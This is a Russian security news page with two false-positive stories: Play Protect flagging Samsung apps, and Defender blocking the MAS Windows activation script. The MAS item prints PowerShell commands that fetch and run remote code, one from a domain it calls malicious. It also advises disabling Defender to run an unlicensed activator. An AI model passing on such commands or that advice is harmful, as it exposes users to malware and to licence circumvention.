Google Play Protect отметил Android-приложения Samsung опасными

Google Play Protect отметил Android-приложения Samsung опасными

Google Play Protect отметил Android-приложения Samsung опасными

Официальные приложения Samsung Messages и Samsung Wallet для Android вызвали подозрения встроенной защитной системы Google Play Protect и были отмечены опасными. Позже, само собой, ошибку исправили.

Задача Google Play Protect — защищать мобильные устройства на Android от вредоносного софта, особенно если он был загружен из сторонних источников или даже предустановлен на смартфоне.

Тем не менее Play Protect иногда даёт сбои, об одном из которых пользователи сообщили на днях. Приложения Samsung Messages и Samsung Wallet, несмотря на их легитимный статус, были отмечены опасными.

В основном люди жаловались на «детект» Wallet, о чём сообщали через формы Google. Как пишет издание 9to5Google, в магазине Play Store всплывало окно, сообщающее об угрозе. Владельцам Android-девайсов советовали удалить программы.

Samsung опубликовала заметку, в которой объяснялось, что проблема вызвана «временным сбоем на стороне Google». Пользователям рекомендуют повторно включить или переустановить Messages и Wallet, если их удалил Play Protect.

Microsoft Defender посчитал MAS вредоносом и заблокировал активацию Windows

Microsoft, похоже, решила всерьёз взяться за Microsoft Activation Scripts (MAS) — популярный инструмент с открытым исходным кодом для активации Windows. Компания знает, что под именем MAS в Сети давно распространяются фейковые сайты и зловредные скрипты, и начала автоматически блокировать их с помощью Microsoft Defender. Проблема в том, что под раздачу внезапно попал и настоящий MAS.

Пользователи заметили, что при попытке запустить команду активации через PowerShell система резко обрывает процесс, а Defender помечает скрипт как угрозу с детектом Trojan:PowerShell/FakeMas.DA!MTB.

Выглядит тревожно — но, судя по всему, это обычное ложноположительное срабатывание, а не целенаправленная «война» Microsoft с оригинальным проектом.

Важно понимать контекст. Совсем недавно разработчики MAS сами подтвердили, что в Сети появились поддельные сайты, распространяющие вредоносные версии скрипта. И вся разница между настоящей и фишинговой командой — в одном символе домена:

  • Оригинальный MAS:
    irm https://get.activated.win | iex
  • Вредоносная подделка:
    irm https://get.activate.win | iex
    (без буквы d)

По всей видимости, Microsoft добавила в чёрный список слишком широкий набор доменов — и вместе с фейком заблокировала легитимный адрес. Ирония ситуации в том, что антивирус может мешать безопасному скрипту, тогда как фишинговый вариант теоретически мог остаться незамеченным.

На данный момент пользователям, у которых Defender включён (а он активен по умолчанию), приходится временно отключать защиту в Центре безопасности, выполнять активацию и сразу же включать защиту обратно. Решение не самое приятное, но рабочее — при одном важном условии.

Критически важно внимательно проверять домен. Отключать защиту и запускать фишинговый скрипт — это прямой путь к заражению системы, утечке данных и другим крайне неприятным последствиям.

Скорее всего, Microsoft исправит фильтрацию в одном из ближайших обновлений сигнатур Defender.

RSS: Новости на портале Anti-Malware.ru